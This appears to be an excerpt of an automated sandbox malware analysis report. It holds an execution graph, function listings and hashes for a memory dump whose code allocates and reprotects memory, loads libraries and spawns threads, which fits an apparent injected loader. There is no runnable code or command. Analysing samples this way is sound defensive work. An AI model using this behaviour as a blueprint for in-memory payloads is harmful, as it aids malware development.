                                                                                                                            • Instruction ID: 0c0e6288bb74e38c03d3acc2e6d49cf587f7ffeb63a82042cf818f3927628381
                                                                                                                            • Opcode Fuzzy Hash: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction Fuzzy Hash: 0DD012326002086BDB009B59E84AA4D37D8DB44238B948405F44DC7652DB79E8554A5C

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:317
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            execution_graph 5597 232122 5598 232124 CreateThread 5597->5598 5599 232130 5598->5599 5600 23216c RtlExitUserThread 5599->5600 5601 23215a 5600->5601 5602 2321d8 RtlExitUserThread 5601->5602 5603 2321e4 5602->5603 5785 2307a2 5786 2307b4 5785->5786 5787 2307ce 5786->5787 5788 2307d9 2 API calls 5786->5788 5789 2308bd 2 API calls 5787->5789 5788->5787 5790 23089c 5789->5790 5616 23082b 5617 230846 5616->5617 5620 2308bd 5617->5620 5619 23089c 5625 2308ce 5620->5625 5622 2308c2 EnumWindows 5624 230946 5622->5624 5624->5619 5626 2308eb 5625->5626 5627 23093a EnumWindows 5626->5627 5628 230946 5627->5628 5628->5622 5795 2321ab 5796 2321c6 5795->5796 5797 2321d8 RtlExitUserThread 5796->5797 5798 2321e4 5797->5798 5803 231fa9 5804 231fb3 5803->5804 5805 2320b8 3 API calls 5804->5805 5808 2320ab 5805->5808 5806 232124 CreateThread 5807 232130 5806->5807 5809 23216c RtlExitUserThread 5807->5809 5808->5806 5810 23215a 5809->5810 5811 2321d8 RtlExitUserThread 5810->5811 5812 2321e4 5811->5812 5633 231f30 5634 231f41 5633->5634 5636 231f5e 5633->5636 5635 231f6a 5 API calls 5634->5635 5634->5636 5635->5636 5637 2320b8 3 API calls 5636->5637 5640 2320ab 5637->5640 5638 232124 CreateThread 5639 232130 5638->5639 5641 23216c RtlExitUserThread 5639->5641 5640->5638 5642 23215a 5641->5642 5643 2321d8 RtlExitUserThread 5642->5643 5644 2321e4 5643->5644 5490 231b34 5491 231b4f 5490->5491 5492 231b61 VirtualProtect 5491->5492 5493 231b6d 5492->5493 5494 232148 5493->5494 5497 231c6c 5493->5497 5495 23216c RtlExitUserThread 5494->5495 5496 23215a 5495->5496 5500 2321d8 RtlExitUserThread 5496->5500 5502 231dd0 5497->5502 5501 2321e4 5500->5501 5503 231ded 5502->5503 5504 231e3c VirtualAlloc 5503->5504 5505 231e48 5504->5505 5519 231ebb 5505->5519 5507 231eb4 5510 231f5e 5511 2320b8 3 API calls 5510->5511 5514 2320ab 5511->5514 5512 232124 CreateThread 5513 232130 5512->5513 5515 23216c RtlExitUserThread 5513->5515 5514->5512 5516 23215a 5515->5516 5517 2321d8 RtlExitUserThread 5516->5517 5518 231dc3 5517->5518 5520 231ed8 5519->5520 5521 231f4f 5520->5521 5524 231fe3 5520->5524 5522 231f6a 5 API calls 5521->5522 5523 231f5e 5522->5523 5523->5524 5525 2320b8 3 API calls 5524->5525 5528 2320ab 5525->5528 5526 232124 CreateThread 5527 232130 5526->5527 5529 23216c RtlExitUserThread 5527->5529 5528->5526 5530 23215a 5529->5530 5531 2321d8 RtlExitUserThread 5530->5531 5532 231ea7 5531->5532 5532->5507 5532->5510 5533 231f6a 5532->5533 5534 231f87 5533->5534 5535 2320b8 3 API calls 5534->5535 5538 2320ab 5535->5538 5536 232124 CreateThread 5537 232130 5536->5537 5539 23216c RtlExitUserThread 5537->5539 5538->5536 5540 23215a 5539->5540 5541 2321d8 RtlExitUserThread 5540->5541 5542 2321e4 5541->5542 5542->5510 5543 2313bb 5544 2313d6 5543->5544 5545 2313e8 VirtualProtect 5544->5545 5546 2313f4 5545->5546 5547 231e3a 5548 231e3c VirtualAlloc 5547->5548 5549 231e48 5548->5549 5550 231ebb 7 API calls 5549->5550 5551 231ea7 5550->5551 5552 231eb4 5551->5552 5553 231f4f 5551->5553 5556 231fe3 5551->5556 5554 231f6a 5 API calls 5553->5554 5555 231f5e 5554->5555 5555->5556 5557 2320b8 3 API calls 5556->5557 5560 2320ab 5557->5560 5558 232124 CreateThread 5559 232130 5558->5559 5561 23216c RtlExitUserThread 5559->5561 5560->5558 5562 23215a 5561->5562 5563 2321d8 RtlExitUserThread 5562->5563 5564 2321e4 5563->5564 5565 231639 5566 231654 5565->5566 5567 231666 VirtualProtect 5566->5567 5569 231672 5567->5569 5568 231797 VirtualProtect 5568->5569 5569->5568 5570 2317d6 5569->5570 5571 230938 5572 23093a EnumWindows 5571->5572 5573 230946 5572->5573 5574 23203d 5575 23203e 5574->5575 5576 2320b8 3 API calls 5575->5576 5578 2320ab 5576->5578 5577 232124 CreateThread 5579 232130 5577->5579 5578->5577 5580 23216c RtlExitUserThread 5579->5580 5581 23215a 5580->5581 5582 2321d8 RtlExitUserThread 5581->5582 5583 2321e4 5582->5583 5645 230700 5646 23070d 5645->5646 5649 230a2b 5646->5649 5651 2307ce 5646->5651 5652 2307d9 5646->5652 5648 2308bd 2 API calls 5650 23089c 5648->5650 5651->5648 5657 2307ec 5652->5657 5654 2307df 5655 2308bd 2 API calls 5654->5655 5656 23089c 5655->5656 5656->5651 5658 230809 5657->5658 5659 2308bd 2 API calls 5658->5659 5660 23089c 5659->5660 5660->5654 5832 23068b 5833 2306a8 5832->5833 5841 230716 5833->5841 5835 230709 5836 2307d9 2 API calls 5835->5836 5838 230a2b 5835->5838 5840 2307ce 5835->5840 5836->5840 5837 2308bd 2 API calls 5839 23089c 5837->5839 5840->5837 5842 230733 5841->5842 5843 2307d9 2 API calls 5842->5843 5845 230a2b 5842->5845 5847 2307ce 5842->5847 5843->5847 5844 2308bd 2 API calls 5846 23089c 5844->5846 5845->5835 5846->5835 5847->5844 5848 23078b 5849 23079c 5848->5849 5852 230a2b 5848->5852 5850 2307d9 2 API calls 5849->5850 5854 2307ce 5849->5854 5850->5854 5851 2308bd 2 API calls 5853 23089c 5851->5853 5854->5851 5661 231e0f 5662 231e2a 5661->5662 5663 231e3c VirtualAlloc 5662->5663 5664 231e48 5663->5664 5665 231ebb 7 API calls 5664->5665 5667 231ea7 5665->5667 5666 231eb4 5667->5666 5668 231f6a 5 API calls 5667->5668 5669 231f5e 5667->5669 5668->5669 5670 2320b8 3 API calls 5669->5670 5673 2320ab 5670->5673 5671 232124 CreateThread 5672 232130 5671->5672 5674 23216c RtlExitUserThread 5672->5674 5673->5671 5675 23215a 5674->5675 5676 2321d8 RtlExitUserThread 5675->5676 5677 2321e4 5676->5677 5678 23090d 5679 230928 5678->5679 5680 23093a EnumWindows 5679->5680 5681 230946 5680->5681 5682 231013 5683 231030 5682->5683 5684 23107f LoadLibraryA 5683->5684 5685 23108b 5684->5685 5700 231c65 5701 231c77 5700->5701 5702 231dd0 10 API calls 5701->5702 5703 231dc3 5702->5703 5704 23176a 5707 2316ad 5704->5707 5705 231797 VirtualProtect 5705->5707 5706 2317d6 5707->5705 5707->5706 5708 231b6a 5709 231b79 5708->5709 5710 232148 5709->5710 5712 231c6c 5709->5712 5711 23216c RtlExitUserThread 5710->5711 5713 23215a 5711->5713 5714 231dd0 10 API calls 5712->5714 5716 2321d8 RtlExitUserThread 5713->5716 5715 231dc3 5714->5715 5717 2321e4 5716->5717 5465 231ff0 5466 231ff2 5465->5466 5475 2320b8 5466->5475 5468 232124 CreateThread 5469 232130 5468->5469 5483 23216c 5469->5483 5470 2320ab 5470->5468 5472 23215a 5473 2321d8 RtlExitUserThread 5472->5473 5474 2321e4 5473->5474 5476 2320d5 5475->5476 5477 232124 CreateThread 5476->5477 5478 232130 5477->5478 5479 23216c RtlExitUserThread 5478->5479 5480 23215a 5479->5480 5481 2321d8 RtlExitUserThread 5480->5481 5482 2321e4 5481->5482 5482->5470 5484 232189 5483->5484 5485 2321d8 RtlExitUserThread 5484->5485 5486 2321e4 5485->5486 5486->5472 5883 2320f7 5884 232112 5883->5884 5885 232124 CreateThread 5884->5885 5886 232130 5885->5886 5887 23216c RtlExitUserThread 5886->5887 5888 23215a 5887->5888 5889 2321d8 RtlExitUserThread 5888->5889 5890 2321e4 5889->5890 5891 231af5 5892 231b12 5891->5892 5893 231b61 VirtualProtect 5892->5893 5894 231b6d 5893->5894 5895 232148 5894->5895 5897 231c6c 5894->5897 5896 23216c RtlExitUserThread 5895->5896 5898 23215a 5896->5898 5899 231dd0 10 API calls 5897->5899 5901 2321d8 RtlExitUserThread 5898->5901 5900 231dc3 5899->5900 5902 2321e4 5901->5902 5912 231efa 5913 231f15 5912->5913 5914 231f6a 5 API calls 5913->5914 5915 231f5e 5913->5915 5914->5915 5916 2320b8 3 API calls 5915->5916 5918 2320ab 5916->5918 5917 232124 CreateThread 5919 232130 5917->5919 5918->5917 5920 23216c RtlExitUserThread 5919->5920 5921 23215a 5920->5921 5922 2321d8 RtlExitUserThread 5921->5922 5923 2321e4 5922->5923 5924 2315fa 5925 231617 5924->5925 5926 231666 VirtualProtect 5925->5926 5927 231672 5926->5927 5928 231797 VirtualProtect 5927->5928 5929 2317d6 5927->5929 5928->5927 5584 23107d 5585 23107f LoadLibraryA 5584->5585 5586 23108b 5585->5586 5726 23137c 5727 231399 5726->5727 5728 2313e8 VirtualProtect 5727->5728 5729 2313f4 5728->5729 5930 2306ca 5931 2306e5 5930->5931 5932 230716 2 API calls 5931->5932 5933 230709 5932->5933 5934 2307d9 2 API calls 5933->5934 5936 230a2b 5933->5936 5938 2307ce 5933->5938 5934->5938 5935 2308bd 2 API calls 5937 23089c 5935->5937 5938->5935 5487 2321d6 5488 2321d8 RtlExitUserThread 5487->5488 5489 2321e4 5488->5489 5748 230856 5749 230858 5748->5749 5750 2308bd 2 API calls 5749->5750 5751 23089c 5750->5751 5752 230755 5753 230770 5752->5753 5754 2307d9 2 API calls 5753->5754 5756 230a2b 5753->5756 5758 2307ce 5753->5758 5754->5758 5755 2308bd 2 API calls 5757 23089c 5755->5757 5758->5755 5769 231f58 5770 231f59 5769->5770 5771 231f6a 5 API calls 5770->5771 5772 231f5e 5771->5772 5773 2320b8 3 API calls 5772->5773 5776 2320ab 5773->5776 5774 232124 CreateThread 5775 232130 5774->5775 5777 23216c RtlExitUserThread 5775->5777 5776->5774 5778 23215a 5777->5778 5779 2321d8 RtlExitUserThread 5778->5779 5780 2321e4 5779->5780

                                                                                                                            Executed Functions

                                                                                                                            Function 00231AF5 Relevance: 3.3, APIs: 2, Instructions: 283memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            Function 00231B34 Relevance: 1.7, APIs: 1, Instructions: 192memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81
                                                                                                                            Function 00231DD0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 776a5c64f1a306dd56843be8127c0eba6ea4a7ea08eb195fb411112e3a0670e1
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 7591ACF6A30622DAFF1C5670CC66BBC2516E7E0700F28E52DA203D9593DEFD48759910
                                                                                                                            Function 0023137C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 103 23137c-23148f call 230af8 * 2 call 230c47 VirtualProtect 116 231491-2314a4 103->116 117 2314a9-2314f1 103->117 116->117 120 2314f7-231559 117->120 124 23155b-231561 120->124
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: b20c1959161d0f1f9c531eb60a5189586cdbcece0d3637516fb23815953db608
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: C951E777E201249FEF0CCF69DC91ABCB7A2FBD4310F1A9129D506EF691DA7899108650
                                                                                                                            Function 002315FA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 30c78a522f2e71bc220e65b5c7970da539e64260b9fdfd2025595f88e36ee212
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: B4417EF3A301128BEB0C5BA8CD66BBDA599E7D4700F2CD53DA003D92C2DEBC44709960
                                                                                                                            Function 002313BB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 169 2313bb-2313ef call 230c47 VirtualProtect 175 2313f4-23148f 169->175 177 231491-2314a4 175->177 178 2314a9-2314f1 175->178 177->178 181 2314f7-231559 178->181 185 23155b-231561 181->185
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 2c4837a0af600eb7f25f44e8345b599641db20ef1f249705d6615fcd0763e197
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 7041A577E20124DFDF0CCF99D881AACB7B2FBD4310F169169D906AF691DB7499108A90
                                                                                                                            Function 00231639 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 186 231639-2316aa call 230c47 VirtualProtect 196 2316ad-231724 call 230eb7 call 23172b 186->196 205 231726-231792 call 230af8 * 2 call 230c47 196->205 206 231795-231796 196->206 208 231797-23179e VirtualProtect 205->208 206->208 209 2317a3-2317d0 208->209 209->196 219 2317d6-2317e4 209->219
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 60459ea788514fb387b3a35e0d280d9ae4b321a29c886091a4ac0bfa301d5fbb
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: B0415EB3A341129BDB0C5BA8CD566BDB6A5EBD4301F2DD62DD003DA286DFBC44709A60
                                                                                                                            Function 00231EBB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 2becfb1312bca027ec711fc72dfe731846032c906d6c346913d924ad6d5e0069
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: A37156FAA74722DAFB1C62B4CC66BBC2416EBE0711F68A52DA303D95D3CEEC44645910
                                                                                                                            Function 00231EFA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 314 231efa-231f3b call 230c47 322 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 314->322 323 231f41-231f49 314->323 361 232113 322->361 362 2320ae-2320af 322->362 323->322 325 231f4f-231f5f call 231f6a 323->325 333 231f61 325->333 334 231fca-231fd1 325->334 336 231fb3-231fc9 call 230c47 333->336 337 231f63 333->337 346 231fd6-231fe2 334->346 336->334 338 231f65-231fb2 call 230af8 * 2 337->338 339 231fd4-231fd5 337->339 338->336 339->346 346->322 364 232116-232119 361->364 363 2320b1-232119 call 230af8 * 2 call 230c47 362->363 362->364 366 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 363->366 364->366
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: 1f2713b15d191a3e6ff4aa7b7b5bb86564c5ab67c13c1dd1677a4f5e2cf529fb
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: D46188FAA30722DAFB1C52B4CC66BBC6456EBE0710F2CF52DA203D8593CEEC44649910
                                                                                                                            Function 00231F25 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 398 231f25-231f3b 402 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 398->402 403 231f41-231f49 398->403 441 232113 402->441 442 2320ae-2320af 402->442 403->402 405 231f4f-231f5f call 231f6a 403->405 413 231f61 405->413 414 231fca-231fd1 405->414 416 231fb3-231fc9 call 230c47 413->416 417 231f63 413->417 426 231fd6-231fe2 414->426 416->414 418 231f65-231fb2 call 230af8 * 2 417->418 419 231fd4-231fd5 417->419 418->416 419->426 426->402 444 232116-232119 441->444 443 2320b1-232119 call 230af8 * 2 call 230c47 442->443 442->444 446 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 443->446 444->446
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: 4c5889ccbfee01b959fb99ad92e9a9818881da2afc227050a63deb5dc84a1498
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: B5518AFAA34722DAFB1C52B4CD56BBC2416E7E0710F28F52DA343D9593CEEC44689910
                                                                                                                            Function 00231013 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 478 231013-23109c call 230af8 * 2 call 230c47 LoadLibraryA 491 23109e-2310ab 478->491 492 2310ad-2310b8 478->492 494 2310ba-2310f7 491->494 492->494 499 23124e-231264 494->499 500 2310fd-231107 494->500 508 231266-231279 499->508 509 231299-2312a8 499->509 501 231127-231142 500->501 502 231109-231125 500->502 511 231147-231163 call 23116e 501->511 502->511 512 23127b-23127e 508->512 519 231165-2311d3 call 230af8 * 2 call 230c47 511->519 520 2311d4-2311f8 511->520 513 231280-231293 512->513 514 231295-231297 512->514 513->512 514->509 519->520 528 2311fa-231206 520->528 529 23123e-231249 520->529 532 231236-23123b 528->532 533 231208-231216 528->533 532->529 535 231218-23121b 533->535 537 23122d-231231 535->537 538 23121d-23122b 535->538 537->532 538->535
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: 7cbc2ba3af5a4e56bee967a37a3363aaa9e13873e80c38a29cd49190461c2271
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 0F6166F2B746528EEB0D8A68CCA17BD6696EBC0301F28D13DCA43DA1D5DEF844718A50
                                                                                                                            Function 00231F30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 543 231f30-231f3b 544 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 543->544 545 231f41-231f49 543->545 583 232113 544->583 584 2320ae-2320af 544->584 545->544 547 231f4f-231f5f call 231f6a 545->547 555 231f61 547->555 556 231fca-231fd1 547->556 558 231fb3-231fc9 call 230c47 555->558 559 231f63 555->559 568 231fd6-231fe2 556->568 558->556 560 231f65-231fb2 call 230af8 * 2 559->560 561 231fd4-231fd5 559->561 560->558 561->568 568->544 586 232116-232119 583->586 585 2320b1-232119 call 230af8 * 2 call 230c47 584->585 584->586 588 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 585->588 586->588
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: c166ac209fa431da22314d504f111604cd9e5dd1dcf0258f41aa6a2790330bca
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: 2B519CFAA34722DAFB1C52A4CD56BBC2516E7E0710F2CF52DA343D9587CEEC44689910
